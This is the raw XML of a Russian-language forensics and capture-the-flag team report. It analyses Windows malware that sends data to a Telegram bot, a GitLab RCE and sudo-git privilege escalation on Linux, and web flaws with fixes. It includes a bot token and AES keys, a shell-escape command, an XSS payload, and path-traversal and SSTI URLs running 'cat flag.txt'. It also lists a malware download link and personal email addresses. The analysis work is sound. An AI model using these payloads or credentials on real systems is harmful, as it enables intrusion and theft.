          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017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Еще программа убивает некоторые логгеры запросов (wireshark, tshark) и дебаггеры (taskmgr, gdb, x64dbg). И изменяет header секции методом PE Section Replace. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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Какой алгоритм шифрования используется при шифровании данных?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182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AES CBC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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Какой ключ шифрования используется при шифровании данных?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184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В процессе анализа впо нами было обнаружено, что впо использует следующие ключи: AES CBC key=”amogusamogusamogusamogusamogusam” iv =”abababababababab” для рансомвари (для шифрования)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185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binascii import unhexlify as unhex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base64 import b64decode as bb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Crypto.Cipher import AES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dec(st):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 = len(st)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v2 = 0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v4 = list(st)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while v2&lt;a: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v5 = 50 * (v2 // 0x32)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v6 = v2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v2+=1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v4[v2-1] = v4[v2-1] ^ (v6 - v5 + 54);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bytes(v4)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decrypt_arr(arr):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dec(b''.join(map(lambda x:unhex(x)[::-1], arr)))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encs = list(map(bb, open('./senddocument.txt').read().split('\n')))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encs[-1]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strs = [b'amogus'*5+b'am', b'ab'*8,b'sugoma'*5+b'su']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for i in range(len(strs)):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    for j in range(len(strs)):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        iv,key = strs[i],strs[j]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        cipher = AES.new(key, AES.MODE_CBC, iv=iv)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        print(iv,key,cipher.decrypt(enc[-1]))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iv,key = b'abababababababab' ,b'amogusamogusamogusamogusamogusam' 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cipher = AES.new(key, AES.MODE_CBC, iv=iv)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cipher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A5">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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Куда злоумышленник отсылает собранные данные? Каким образом он аутентифицируется на endpoint?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Исследовав поведение малваря, при помощи Charles, мы выяснили, что ВПО обращается на эндпоинт, указанный ниже. Отсылает шифрованные данные в файле info.txt. Имя бота: some_forensics_testing_bot. Аутентификация с помощью ключа с помощью токена в URL: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https://api.telegram.org/bot7029575943:AAFNYmmW_QqqMcaHZ-DFRn3M05DptExeAGE/sendDocument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after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Каково содержимое расшифрованного файла pass.txt на рабочем столе?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K0uvQoK4IHyTxMGgFXcWFdYEPqZzSTO8G79diypFSlU= -&gt; “sFYZ#2z9VdUR9sm`3JRz”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AA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Часть 2 (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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Какой сервис на данном сервере уязвим? Какая версия?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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На данном сервере уязвима версия gitlab v15.2.2, CVE-2022-2884 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B0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Какой тип уязвимости использовал злоумышленник?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Данная CVE позволяет удаленно выполнить код на сервере -&gt; уязвимость RCE. В ходе анализа файлов логов gitlab были обнаружены запросы к уязвимому endpoint api/v4/import/github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Какие ошибки были допущены при конфигурации сервера?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Файл /etc/sudoers: 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# I need this to have gitlab runners execute properly</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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# This is not very secure and will fix it later. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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# Hope nobody will sploit me… </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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# git ALL=NOPASSWD: /usr/bin/git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Таким образом, sudo на git было доступно всем, что позволяло повысить привилегии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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злоумышленник повысил привилегии?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Оболочку можно было получить так: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sudo git -p help config</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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!/bin/sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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При этом злоумышленник просто добавил свой ssh-ключ в авторизованные для пользователя root с помощью команды sudo git apply.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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злоумышленник получил доступ к серверу на постоянной основе?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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В файле /root/.ssh/authorized_keys была обнаружена следующая строчка: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ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIKXFjUp2LlKAsLvM1PZE7CYEfztiZrOf8PHx9ja1mu2 amongus@debian</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Это позволяет злоумышленнику на постоянной основе подключаться по SSH от пользователя root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2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злоумышленник просканировал систему?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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В истории пользователя root есть удаление файла /tmp/linpeas.txt - результатов известного сканера системы, который был использован.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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 помощью какого ВПО злоумышленник закрепился на сервере? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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В директории /root есть скрипт autokitter.sh, создающий два so файла - jynx2.so (reverse-shell, работающий с паролем и через ssl) и reality.so (библиотека со вспомогательными функциями). В этом скрипте есть исходные коды этого шелла, закодированные в base64.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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Исправление уязвимостей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160" w:line="259" w:lineRule="auto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spacing w:after="0" w:afterAutospacing="0"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response.headers.add(“Access-Control-Allow-Origin”, “*”)  является уязвимостью, т.к. не имеет ограничений относительно кросс-доменов. Может привести к атакам типа CSRF (межсайтовая подделка запросов) и миссконфиг CORS. Рекомендуем ограничивать круг доменов, давая доступ только доверенным ресурсам.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Пароли в базе данных хранятся в открытом виде - это видно и из кода, и из самой базы данных. Если внутренний нарушитель получит доступ к БД, он сможет использовать эти пароли. Безопасное решение: хранить пароли в базе данных в виде хеша с солью - соль позволит избежать и быстрого перебора прообраза хеша грубой силой.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смене пароля пользователя не обновляется токен, поэтому когда мы меняем пароль и есть активная сессия, то она не завершается. Исправление - инвалидировать токен при смене пароля.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 правах администратора хранится и проверяется в токене - если снять с него права администратора или даже удалить аккаунт, по старому токену они будут доступны, так как не проверяются из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60"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Уязвимости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spacing w:after="160" w:line="259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В функции updateLight не проверяется, что пользователь - администратор. Исправление:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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error: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code = HTTPStatus.UNAUTHORIZED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elif not ('isAdmin' in data) or not bool(data['isAdmin']):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error = 'Доступ запрещен'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code = HTTPStatus.FORBIDDEN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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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spacing w:after="160" w:line="259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211 строка auth_api.py - SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:topFromText="180" w:bottomFromText="180" w:vertAnchor="text" w:horzAnchor="text" w:tblpX="690" w:tblpY="0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sql_query = "UPDATE user SET pw = '" + str(new_password) + "' WHERE login = '" + str(username) + "';"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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Исправление:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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sql_query = "UPDATE user SET pw =? WHERE login = ?;"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try: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update_cursor.execute(sql_query, (new_password,username))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db.commit()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after="160" w:line="259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уязвимость xss: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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/api HTTP/1.1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Host: 10.10.29.10:8007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Content-Length: 62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Access-Control-Allow-Origin: *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Accept: application/json, text/plain, */*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ContentType: application/json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 Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InN0dWRlbnQ5NjQ2MSIsImlzQWRtaW4iOmZhbHNlLCJleHAiOjE3MTEwMjQ0NTJ9.0Z4FVfK7qufJ011iddQ85Pc2joDIgbjiVqXyDHIYJog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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36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Origin: http://10.10.29.10:8007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Referer: http://10.10.29.10:8007/lights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Accept-Encoding: gzip, deflate, br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Accept-Language: en-US,en;q=0.9</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E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Connection: close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{"function":"addNote","noteText":"&lt;script&gt; print() &lt;/script&gt;"}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spacing w:after="160" w:line="259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Исправление:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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html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noteText = html.escape(content[‘noteText’])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">
      <w:pPr>
        <w:spacing w:after="16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Если с админского аккаунта послать запрос на получение пользователей: /api?function=getUsers, api также возвращает пароли пользователей. При этом фронтенд их не отрисовывает, но api возвращает. Разглашать пароли даже администраторам небезопасно. Исправление:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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= {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'login': row[0],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'isAdmin': bool(row[1]),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'name': row[3]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1FA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2.168.12.10:5001/download?file_type=../../../../etc/secret" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.12.10:5001/download?file_type=file1.txt" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.12.11:8001//flag?name=%7B%7B%20cycler.__init__.__globals__.os.popen(%27cat%20flag.txt%27).read()%20" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.12.13:8090/doc/__$%7Bnew%20java.util.Scann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ir.kud@inbox.ru" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://95.169.192.220:8080/prikol.exe" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:j.nathan@microsoft.com" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.telegram.org/bot7029575943:AAFNYmmW_QqqMcaHZ-DFRn3M05DptExeAGE/sendDocument" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://habr.com/ru/articles/797127/%5D(https://habr.com/ru/articles/797127/)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:aporkhunov@yandex-team.ru" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:yanagerasimenko@bk.ru" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:borozenets2006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